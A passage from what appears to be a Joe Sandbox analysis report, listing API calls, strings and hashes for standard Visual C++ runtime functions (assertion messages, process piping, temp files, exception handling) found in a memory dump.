                                                                                                          • Instruction Fuzzy Hash: 7211E6B72402D2C3D2D08B6DD8B07EAA795FBD622F729436BD0A18F658D923F1459D00
                                                                                                          Function 6FDFC44D Relevance: 107.2, APIs: 51, Strings: 10, Instructions: 422stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _set_error_mode.MSVCR100(00000003), ref: 6FDFC473
                                                                                                          • _set_error_mode.MSVCR100(00000003), ref: 6FDFC484
                                                                                                          • strcpy_s.MSVCR100(?,0000021C,Assertion failed!), ref: 6FDFC4AD
                                                                                                          • strcat_s.MSVCR100(?,0000021C), ref: 6FDFC4CB
                                                                                                          • strcat_s.MSVCR100(?,0000021C,Program: ), ref: 6FDFC4E8
                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 6FDFC509
                                                                                                          • strcpy_s.MSVCR100(?,00000105,<program name unknown>), ref: 6FDFC524
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDFC535
                                                                                                          • strlen.MSVCR100(?,00000000,00000000,00000000,00000000,00000000), ref: 6FDFC547
                                                                                                          • strlen.MSVCR100(?,00000000,00000000,00000000,00000000,00000000), ref: 6FDFC55C
                                                                                                          • _mbsnbcpy_s.MSVCR100(00000000,?,00000003,?,00000000,00000000,00000000,00000000,00000000), ref: 6FDFC584
                                                                                                          • strcat_s.MSVCR100(?,0000021C,?,00000000,00000000,00000000,00000000,00000000), ref: 6FDFC59E
                                                                                                          • strcat_s.MSVCR100(?,0000021C,00000000,00000000,00000000), ref: 6FDFC5B8
                                                                                                          • strcat_s.MSVCR100(?,0000021C,File: ,?,?,?,?,00000000,00000000), ref: 6FDFC5D5
                                                                                                          • strlen.MSVCR100(?,?,?,?,?,?,?,?,00000000,00000000), ref: 6FDFC5E6
                                                                                                          • strlen.MSVCR100(?,?,?,?,?,?,?,?,00000000,00000000), ref: 6FDFC5F9
                                                                                                          • _mbsnbcat_s.MSVCR100(?,0000021C,?,00000011,?,?,?,?,?,?,?,00000000,00000000), ref: 6FDFC66C
                                                                                                          • strcat_s.MSVCR100(?,0000021C,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6FDFC68A
                                                                                                          • strcat_s.MSVCR100(?,0000021C,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6FDFC6AB
                                                                                                          • strcat_s.MSVCR100(?,0000021C,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6FDFC6C9
                                                                                                          • strcat_s.MSVCR100(?,0000021C,Line: ), ref: 6FDFC6E6
                                                                                                          • strlen.MSVCR100(?,0000000A), ref: 6FDFC6FF
                                                                                                          • strlen.MSVCR100(?,0000021C,0000000A), ref: 6FDFC711
                                                                                                          • _itoa_s.MSVCR100(?,?,0000021C,0000000A), ref: 6FDFC722
                                                                                                          • strcat_s.MSVCR100(?,0000021C), ref: 6FDFC740
                                                                                                          • strcat_s.MSVCR100(?,0000021C,Expression: ), ref: 6FDFC75D
                                                                                                          • strlen.MSVCR100(?), ref: 6FDFC773
                                                                                                          • strlen.MSVCR100(?,?), ref: 6FDFC781
                                                                                                          • strlen.MSVCR100(?), ref: 6FDFC79E
                                                                                                          • _mbsnbcat_s.MSVCR100(?,0000021C,?,00000169,?), ref: 6FDFC7B9
                                                                                                          • strcat_s.MSVCR100(?,0000021C), ref: 6FDFC7D7
                                                                                                          • strcat_s.MSVCR100(?,0000021C), ref: 6FDFC7F5
                                                                                                          • strcat_s.MSVCR100(?,0000021C,For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts), ref: 6FDFC812
                                                                                                          • strcat_s.MSVCR100(?,0000021C), ref: 6FDFC830
                                                                                                          • strcat_s.MSVCR100(?,0000021C,(Press Retry to debug the application - JIT must be enabled)), ref: 6FDFC84D
                                                                                                          • raise.MSVCR100(00000016), ref: 6FDFC881
                                                                                                          • _exit.MSVCR100(00000003), ref: 6FDFC889
                                                                                                          • _mbsnbcat_s.MSVCR100(?,0000021C,00000000,00000001,00000003), ref: 6FDFC8AC
                                                                                                          • strcat_s.MSVCR100(?,0000021C,?,?,?,00000003), ref: 6FDFC8CA
                                                                                                          • _mbsnbcat_s.MSVCR100(?,0000021C,00000000,00000020,00000003), ref: 6FDFC8F7
                                                                                                          • strcat_s.MSVCR100(?,0000021C,?,?,?,00000003), ref: 6FDFC915
                                                                                                          • _mbsnbcat_s.MSVCR100(?,0000021C,?,00000007,?,?,?,?,?,?,00000003), ref: 6FDFC938
                                                                                                          • strcat_s.MSVCR100(?,0000021C,?,?,?,?,?,?,?,?,?,?,00000003), ref: 6FDFC956
                                                                                                          • __p__iob.MSVCR100 ref: 6FDFC996
                                                                                                          • __p__iob.MSVCR100(00000000,00000004,00000000), ref: 6FDFC9AA
                                                                                                          • setvbuf.MSVCR100(-00000040,00000000,00000004,00000000), ref: 6FDFC9B3
                                                                                                          • __p__iob.MSVCR100(Assertion failed: %s, file %s, line %d,?,?,?), ref: 6FDFC9C5
                                                                                                          • fprintf.MSVCR100(-00000040,Assertion failed: %s, file %s, line %d,?,?,?), ref: 6FDFC9CE
                                                                                                          • __p__iob.MSVCR100(-00000040,Assertion failed: %s, file %s, line %d,?,?,?), ref: 6FDFC9D3
                                                                                                          • fflush.MSVCR100(-00000040,-00000040,Assertion failed: %s, file %s, line %d,?,?,?), ref: 6FDFC9DC
                                                                                                          • abort.MSVCR100 ref: 6FDFC9E4
                                                                                                          Strings
                                                                                                          • <program name unknown>, xrefs: 6FDFC513
                                                                                                          • Expression: , xrefs: 6FDFC750
                                                                                                          • For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts, xrefs: 6FDFC805
                                                                                                          • Microsoft Visual C++ Runtime Library, xrefs: 6FDFC868
                                                                                                          • Assertion failed: %s, file %s, line %d, xrefs: 6FDFC9C0
                                                                                                          • Assertion failed!, xrefs: 6FDFC49B
                                                                                                          • Line: , xrefs: 6FDFC6D9
                                                                                                          • File: , xrefs: 6FDFC5C8
                                                                                                          • (Press Retry to debug the application - JIT must be enabled), xrefs: 6FDFC840
                                                                                                          • Program: , xrefs: 6FDFC4DB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: strcat_s$strlen$_mbsnbcat_s$__p__iob$_set_error_modestrcpy_s$FileModuleName_exit_invoke_watson_itoa_s_mbsnbcpy_sabortfflushfprintfraisesetvbuf
                                                                                                          • String ID: (Press Retry to debug the application - JIT must be enabled)$<program name unknown>$Assertion failed!$Assertion failed: %s, file %s, line %d$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Microsoft Visual C++ Runtime Library$Program:
                                                                                                          • API String ID: 2590874204-2333777566
                                                                                                          • Opcode ID: 04fab976af660f3103ce9a07f47cded5a27cd52955b766e0187d95125c4c8b78
                                                                                                          • Instruction ID: 94711e067bba1b5e3467d7e3ec05043745ec30187fe56febd5f35042395cb442
                                                                                                          • Opcode Fuzzy Hash: 04fab976af660f3103ce9a07f47cded5a27cd52955b766e0187d95125c4c8b78
                                                                                                          • Instruction Fuzzy Hash: E7D1C671D11319BADBA187B1DC88FDA77BCAF19358F4504A5E808E6141F730FBA58E60
                                                                                                          Function 6FDD4FAF Relevance: 98.4, APIs: 51, Strings: 5, Instructions: 413stringprocessCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDD5480,000000A4), ref: 6FDD4FDE
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDD5480,000000A4), ref: 6FDD4FE9
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _pipe.MSVCR100(?,00000400,00000000,6FDD5480,000000A4), ref: 6FDD5055
                                                                                                          • _close.MSVCR100(?,?,?,?,?,?,?,?,6FDD5480,000000A4), ref: 6FDD5092
                                                                                                          • _close.MSVCR100(?,?,?,?,?,?,?,?,?,6FDD5480,000000A4), ref: 6FDD509A
                                                                                                          • _lock.MSVCR100(00000009,?,?,?,?,?,?,?,6FDD5480,000000A4), ref: 6FDD50A8
                                                                                                          • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6FDD5480,000000A4), ref: 6FDD50B7
                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,00000001,00000002,?,?,?,?,?,?,?,6FDD5480,000000A4), ref: 6FDD50E5
                                                                                                          • _close.MSVCR100(?,?,00000000,?,00000000,00000001,00000002,?,?,?,?,?,?,?,6FDD5480,000000A4), ref: 6FDD50F5
                                                                                                          • _fdopen.MSVCR100(?,00000077,?,?,00000000,?,00000000,00000001,00000002), ref: 6FDD510C
                                                                                                          • _dupenv_s.MSVCR100(?,00000000,COMSPEC), ref: 6FDD513B
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDD5151
                                                                                                          • memset.MSVCR100(?,00000000,00000044), ref: 6FDD5177
                                                                                                          • strlen.MSVCR100(?), ref: 6FDD51BC
                                                                                                          • strlen.MSVCR100(?,?), ref: 6FDD51C6
                                                                                                          • strlen.MSVCR100( /c ,?,?), ref: 6FDD51D3
                                                                                                          • _calloc_crt.MSVCR100(?,00000001, /c ,?,?), ref: 6FDD51DF
                                                                                                          • strcpy_s.MSVCR100(00000000,?,?), ref: 6FDD51F7
                                                                                                          • strcat_s.MSVCR100(00000001,?, /c ,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6FDD520C
                                                                                                          • strcat_s.MSVCR100(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6FDD5223
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6FDD5233
                                                                                                          • _access_s.MSVCR100(6FDB3030,00000000), ref: 6FDD5241
                                                                                                          • CreateProcessA.KERNEL32(6FDB3030,00000001,00000000,00000000,00000001,00000000,00000000,00000000,?,?), ref: 6FDD5264
                                                                                                          • _calloc_crt.MSVCR100(00000104,00000001), ref: 6FDD527D
                                                                                                          • free.MSVCR100(00000001,00000000), ref: 6FDD5296
                                                                                                          • free.MSVCR100(?,00000001,00000000), ref: 6FDD529E
                                                                                                            • Part of subcall function 6FDFBBEC: _errno.MSVCR100(00000000,00000000), ref: 6FDFBC07
                                                                                                          • strlen.MSVCR100(00000000), ref: 6FDD5321
                                                                                                          • _mbsrchr.MSVCR100(00000000,0000005C), ref: 6FDD533B
                                                                                                          • strcat_s.MSVCR100(00000000,00000104,6FDB3024), ref: 6FDD534E
                                                                                                          • strlen.MSVCR100(6FDB3030), ref: 6FDD5361
                                                                                                          • strlen.MSVCR100(00000000,6FDB3030), ref: 6FDD536A
                                                                                                          • strcat_s.MSVCR100(00000000,00000104,6FDB3030), ref: 6FDD5382
                                                                                                          • _access_s.MSVCR100(00000000,00000000), ref: 6FDD5394
                                                                                                          • CreateProcessA.KERNEL32(00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000000,?,?), ref: 6FDD53B5
                                                                                                          • free.MSVCR100(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6FDD528E
                                                                                                            • Part of subcall function 6FD8014E: HeapFree.KERNEL32(00000000,00000000,?,6FDA7602,00000000), ref: 6FD80164
                                                                                                          • _errno.MSVCR100 ref: 6FDD52A6
                                                                                                          • _dupenv_s.MSVCR100(?,00000000,PATH), ref: 6FDD52BF
                                                                                                          • free.MSVCR100(?), ref: 6FDD52DB
                                                                                                          • free.MSVCR100(00000000,?), ref: 6FDD52E1
                                                                                                          • free.MSVCR100(00000001,00000000,?), ref: 6FDD52E9
                                                                                                          • free.MSVCR100(?,00000001,00000000,?), ref: 6FDD52F1
                                                                                                          • free.MSVCR100(?), ref: 6FDD53C1
                                                                                                          • free.MSVCR100(00000000,?), ref: 6FDD53C7
                                                                                                          • free.MSVCR100(00000001), ref: 6FDD53D1
                                                                                                          • free.MSVCR100(?,00000001), ref: 6FDD53D9
                                                                                                          • CloseHandle.KERNEL32(?), ref: 6FDD53E9
                                                                                                          • CloseHandle.KERNEL32(?), ref: 6FDD53EE
                                                                                                          • _errno.MSVCR100 ref: 6FDD53F0
                                                                                                          • fclose.MSVCR100(?), ref: 6FDD5423
                                                                                                          • _close.MSVCR100(?,?,00000000,?,00000000,00000001,00000002,?,?,?,?,?,?,?,6FDD5480,000000A4), ref: 6FDD5440
                                                                                                          • _close.MSVCR100(?,?,00000000,?,00000000,00000001,00000002,?,?,?,?,?,?,?,6FDD5480,000000A4), ref: 6FDD5453
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: free$strlen$_close_errno$strcat_s$HandleProcess$CloseCreate_access_s_calloc_crt_dupenv_s$CurrentDuplicateFreeHeap_fdopen_invalid_parameter_invalid_parameter_noinfo_invoke_watson_lock_mbsrchr_pipefclosememsetstrcpy_s
                                                                                                          • String ID: /c $COMSPEC$PATH$cmd.exe$w
                                                                                                          • API String ID: 4026113611-3679458415
                                                                                                          • Opcode ID: 782a2d6b5f46cbf052d2054fb8c36016e28bb1251125b3a615497a11a94e9a35
                                                                                                          • Instruction ID: f62fb0b6540bb6db178759ab63009222dfc03473be5983049280dc9d7c27c3f0
                                                                                                          • Opcode Fuzzy Hash: 782a2d6b5f46cbf052d2054fb8c36016e28bb1251125b3a615497a11a94e9a35
                                                                                                          • Instruction Fuzzy Hash: 91E1B072C05319EFDF909FA8DC80ADD7BB9EF09354F20402AF525AB290DB3179958B61
                                                                                                          Function 6FDD6605 Relevance: 47.5, APIs: 26, Strings: 1, Instructions: 219stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _dupenv_s.MSVCR100(?,00000000,TMP,6FDD6878,00000020), ref: 6FDD6636
                                                                                                            • Part of subcall function 6FDFBAF4: _lock.MSVCR100(00000007,6FDFBBD0,0000000C,6FDD1451,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FDFBB02
                                                                                                            • Part of subcall function 6FDFBAF4: _errno.MSVCR100(6FDFBBD0,0000000C,6FDD1451,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FDFBB1B
                                                                                                            • Part of subcall function 6FDFBAF4: _invalid_parameter_noinfo.MSVCR100(6FDFBBD0,0000000C,6FDD1451,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FDFBB25
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDD664C
                                                                                                          • _access_s.MSVCR100(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FDD6666
                                                                                                          • strlen.MSVCR100(?,00000000,00000000,00000000,00000000,00000000), ref: 6FDD6685
                                                                                                          • strlen.MSVCR100(6FD86E28), ref: 6FDD668F
                                                                                                          • calloc.MSVCR100(?,00000001,6FD86E28), ref: 6FDD66A1
                                                                                                          • strcat_s.MSVCR100(00000000,6FD86E28,6FD86E28), ref: 6FDD66BE
                                                                                                          • strlen.MSVCR100(6FD86E28), ref: 6FDD66D1
                                                                                                          • _mbsrchr.MSVCR100(?,0000005C,?,?,?,00000000,00000000,00000000), ref: 6FDD66E7
                                                                                                          • strcat_s.MSVCR100(00000000,?,6FDB3024,?,?,?,00000000,00000000,00000000), ref: 6FDD66F8
                                                                                                          • _access_s.MSVCR100(?,00000000), ref: 6FDD6719
                                                                                                          • _access_s.MSVCR100(6FDB3024,00000000), ref: 6FDD672F
                                                                                                          • strcat_s.MSVCR100(00000000,?,6FDB3024), ref: 6FDD6754
                                                                                                          • strcat_s.MSVCR100(00000000,?,?), ref: 6FDD677A
                                                                                                          • strlen.MSVCR100(00000000), ref: 6FDD6787
                                                                                                          • _lock.MSVCR100(00000002,00000000), ref: 6FDD6791
                                                                                                          • _errno.MSVCR100 ref: 6FDD67BD
                                                                                                          • _errno.MSVCR100 ref: 6FDD67D9
                                                                                                          • free.MSVCR100(00000000), ref: 6FDD67E1
                                                                                                          • _ultoa_s.MSVCR100(6FD86E28,?,0000000A), ref: 6FDD67FF
                                                                                                          • _errno.MSVCR100 ref: 6FDD680D
                                                                                                          • _access_s.MSVCR100(00000000,00000000), ref: 6FDD6818
                                                                                                            • Part of subcall function 6FDCE8AF: __doserrno.MSVCR100(?,?,00000000,00000000), ref: 6FDCE8BC
                                                                                                            • Part of subcall function 6FDCE8AF: _errno.MSVCR100(?,?,00000000,00000000), ref: 6FDCE8C3
                                                                                                            • Part of subcall function 6FDCE8AF: _invalid_parameter_noinfo.MSVCR100(?,?,00000000,00000000), ref: 6FDCE8CD
                                                                                                          • _errno.MSVCR100 ref: 6FDD6823
                                                                                                          • _errno.MSVCR100 ref: 6FDD682D
                                                                                                          • free.MSVCR100(?), ref: 6FDD6843
                                                                                                          • free.MSVCR100(?,?), ref: 6FDD684B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_access_sstrcat_sstrlen$free$_invalid_parameter_noinfo_lock$__doserrno_dupenv_s_invoke_watson_mbsrchr_ultoa_scalloc
                                                                                                          • String ID: TMP
                                                                                                          • API String ID: 982313535-3125297090
                                                                                                          • Opcode ID: 35de89c66a55421952612d675ab8cf43c0de988aae6c8a2bb97a72d8a7b4c042
                                                                                                          • Instruction ID: 401ff8acb4644da6e57f966c57d273e71c1f31db2316ea027f8751cb8e95a939
                                                                                                          • Opcode Fuzzy Hash: 35de89c66a55421952612d675ab8cf43c0de988aae6c8a2bb97a72d8a7b4c042
                                                                                                          • Instruction Fuzzy Hash: 44519372D05319EEDB915FB48C81ADE7BB8AF0B764F10412AF420AA1D0EF35B5418BB5
                                                                                                          Function 6FD8EB64 Relevance: 45.5, APIs: 30, Instructions: 498fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _isatty.MSVCR100(?,?,00000002,?,?,6FD8ECE1,?,?,?,6FD8ED00,00000010,6FDA89FE,?,00000000,00000002), ref: 6FD8EBF3
                                                                                                          • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000002,?,?,6FD8ECE1,?,?,?,6FD8ED00,00000010,6FDA89FE), ref: 6FD8EC24
                                                                                                          • GetLastError.KERNEL32 ref: 6FD8F105
                                                                                                          • __doserrno.MSVCR100(00000002,?,?,6FD8ECE1,?,?,?,6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0,?), ref: 6FDAFD8D
                                                                                                          • _errno.MSVCR100(00000002,?,?,6FD8ECE1,?,?,?,6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0,?), ref: 6FDAFD94
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000002,?,?,6FD8ECE1,?,?,?,6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0,?), ref: 6FDAFD9F
                                                                                                          • __doserrno.MSVCR100(?,00000002,?,?,6FD8ECE1,?,?,?,6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0), ref: 6FDAFDBA
                                                                                                          • _errno.MSVCR100(?,00000002,?,?,6FD8ECE1,?,?,?,6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0), ref: 6FDAFDC2
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,00000002,?,?,6FD8ECE1,?,?,?,6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0), ref: 6FDAFDCD
                                                                                                          • _getptd.MSVCR100(?,00000002,?,?,6FD8ECE1,?,?,?,6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0), ref: 6FDAFDF8
                                                                                                          • GetConsoleMode.KERNEL32(?,?,?,00000002,?,?,6FD8ECE1,?,?,?,6FD8ED00,00000010,6FDA89FE,?,00000000,00000002), ref: 6FDAFE16
                                                                                                          • GetConsoleCP.KERNEL32(?,6FD8ECE1,?,?,?,6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0,?,?), ref: 6FDAFE36
                                                                                                          • isleadbyte.MSVCR100(00000000), ref: 6FDAFEA6
                                                                                                          • mbtowc.MSVCR100(?,?,00000002), ref: 6FDAFED0
                                                                                                          • mbtowc.MSVCR100(?,?,00000001), ref: 6FDAFEF4
                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 6FDAFF26
                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6FDAFF4F
                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6FDAFFA8
                                                                                                          • _putwch_nolock.MSVCR100(?), ref: 6FDB000B
                                                                                                          • _putwch_nolock.MSVCR100(0000000D), ref: 6FDB0038
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileWrite$Console__doserrno_errno_invalid_parameter_noinfo_putwch_nolockmbtowc$ByteCharErrorLastModeMultiWide_getptd_isattyisleadbyte
                                                                                                          • String ID:
                                                                                                          • API String ID: 727942522-0
                                                                                                          • Opcode ID: c53ed59c140c00d18d3727a9e46faf847aa83cd5867433e16315bd39ff311010
                                                                                                          • Instruction ID: f74edfcecf7cb0c2facb614aa138c9ac0c2c547a6d731f45df7d78b5e8756fc0
                                                                                                          • Opcode Fuzzy Hash: c53ed59c140c00d18d3727a9e46faf847aa83cd5867433e16315bd39ff311010
                                                                                                          • Instruction Fuzzy Hash: 5A127C75A06268DFDBA18F68CD84BD977B4FF06354F0402DAE41AD7985D730AA80CF92
                                                                                                          Function 6FDF4639 Relevance: 44.0, APIs: 23, Strings: 2, Instructions: 269COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ?_inconsistency@@YAXXZ.MSVCR100(E06D7363,1FFFFFFF,19930522,?,6FDF3973,?,?,?,?,?,00000000,00000000,00000000), ref: 6FDF466D
                                                                                                          • _getptd.MSVCR100(E06D7363,1FFFFFFF,19930522,?,6FDF3973,?,?,?,?,?,00000000), ref: 6FDF46B4
                                                                                                          • _getptd.MSVCR100 ref: 6FDF46C6
                                                                                                          • _getptd.MSVCR100 ref: 6FDF46D4
                                                                                                          • ?_ValidateWrite@@YAHPAXI@Z.MSVCR100(?,00000001), ref: 6FDF46E5
                                                                                                          • ?_inconsistency@@YAXXZ.MSVCR100 ref: 6FDF46F0
                                                                                                          • ?_inconsistency@@YAXXZ.MSVCR100 ref: 6FDF471A
                                                                                                          • _getptd.MSVCR100 ref: 6FDF471F
                                                                                                          • _getptd.MSVCR100 ref: 6FDF4731
                                                                                                          • _getptd.MSVCR100 ref: 6FDF473C
                                                                                                          • ??8type_info@@QBE_NABV0@@Z.MSVCR100(6FE25EB8), ref: 6FDF4768
                                                                                                          • ?terminate@@YAXXZ.MSVCR100(E06D7363,1FFFFFFF,19930522,?,6FDF3973,?,?,?,?), ref: 6FDF4779
                                                                                                          • __DestructExceptionObject.MSVCR100(?,00000001,E06D7363,1FFFFFFF,19930522,?,6FDF3973,?,?,?,?), ref: 6FDF4783
                                                                                                          • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,E06D7363,1FFFFFFF,19930522,?,6FDF3973,?,?,?,?), ref: 6FDF4798
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20A10,?,E06D7363,1FFFFFFF,19930522), ref: 6FDF47AD
                                                                                                          • __TypeMatch.MSVCR100(00000010,?,00200065,6FE20A10,?,E06D7363,1FFFFFFF,19930522), ref: 6FDF4862
                                                                                                          • __DestructExceptionObject.MSVCR100(6FDB2708,00000001,?,6FE20A10,?,E06D7363,1FFFFFFF,19930522), ref: 6FDF48D7
                                                                                                          • _getptd.MSVCR100(?,6FE20A10,?,E06D7363,1FFFFFFF,19930522), ref: 6FDF4914
                                                                                                          • _getptd.MSVCR100(?,6FE20A10,?,E06D7363,1FFFFFFF,19930522), ref: 6FDF4919
                                                                                                          • _getptd.MSVCR100(?,6FE20A10,?,E06D7363,1FFFFFFF,19930522), ref: 6FDF491E
                                                                                                          • _getptd.MSVCR100(?,6FE20A10,?,E06D7363,1FFFFFFF,19930522), ref: 6FDF4929
                                                                                                          • _getptd.MSVCR100(E06D7363,1FFFFFFF,19930522,?,6FDF3973,?,?,?,?,?,00000000,00000000,00000000), ref: 6FDF4996
                                                                                                          • ?_inconsistency@@YAXXZ.MSVCR100 ref: 6FDF49A4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _getptd$?_inconsistency@@$Exception$DestructObject$??0exception@std@@??8type_info@@?terminate@@MatchThrowTypeV0@@ValidateWrite@@
                                                                                                          • String ID: csm$csm
                                                                                                          • API String ID: 172940389-3733052814
                                                                                                          • Opcode ID: a4f2093b1f401bd433bf69ecdf9c620c579caf5dab9b11c75570ce3b9a5a47c5
                                                                                                          • Instruction ID: dfbbb8f97472a8397ef4044e825dc8a4216e168147ee914da1ab0672a4187d1e
                                                                                                          • Opcode Fuzzy Hash: a4f2093b1f401bd433bf69ecdf9c620c579caf5dab9b11c75570ce3b9a5a47c5
                                                                                                          • Instruction Fuzzy Hash: 30A1AD31802309DFDF90DFA4CA80E9DB7B5BF06358F16415AE9556B290D730B992CFA2
                                                                                                          Function 6FDD830D Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 182COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _wdupenv_s.MSVCR100(?,00000000,TMP,6FDD8538,00000020), ref: 6FDD833E
                                                                                                            • Part of subcall function 6FD90CD7: _lock.MSVCR100(00000007,6FD90D48,0000000C), ref: 6FD90CE5
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDD8354
